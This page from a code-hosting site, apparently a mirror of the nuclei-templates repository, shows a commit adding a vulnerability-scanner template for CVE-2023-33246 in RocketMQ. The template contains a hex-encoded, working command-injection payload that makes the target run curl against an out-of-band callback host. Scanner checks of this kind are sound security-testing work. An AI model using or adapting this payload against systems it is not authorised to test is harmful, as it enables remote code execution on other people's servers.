daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #7340 from projectdiscovery/pussycat0x-patch-14 

CVE-2023-33246  -  RocketMQ <= 5.1.0 Remote Code Execution
patch-10
Ritik Chaddha 2023-06-08 23:46:44 +05:30 committed by GitHub
parent 3c65a7e6b6 13cfd3403b
commit 25b6a01944
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 45 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

45
network/cves/2023/CVE-2023-33246.yaml Normal file
View File

@ -0,0 +1,45 @@
id: CVE-2023-33246
info:
name: RocketMQ <= 5.1.0 - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x .
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-33246
- https://github.com/I5N0rth/CVE-2023-33246
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-33246
cwe-id: CWE-94
epss-score: 0.00045
cpe: cpe:2.3:a:apache:rocketmq:*:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
shodan-query: title:"RocketMQ"
fofa-query: protocol="rocketmq"
tags: cve,cve2023,rocketmq,rce,oast
variables:
part_a: '{{ hex_decode ("000000d2000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f206375726c20") }}'
part_b: '{{ hex_decode("3b0a") }}'
tcp:
- host:
- "{{Hostname}}"
- "{{Host}}:10911"
inputs:
- data: '{{ part_a + "{{interactsh-url}}" + "/////////////" + part_b }}'
read: 1024
read-size: 4
matchers:
- type: dsl
dsl:
- contains(raw,'serializeTypeCurrentRPC')
- contains(interactsh_protocol,'dns')
condition: and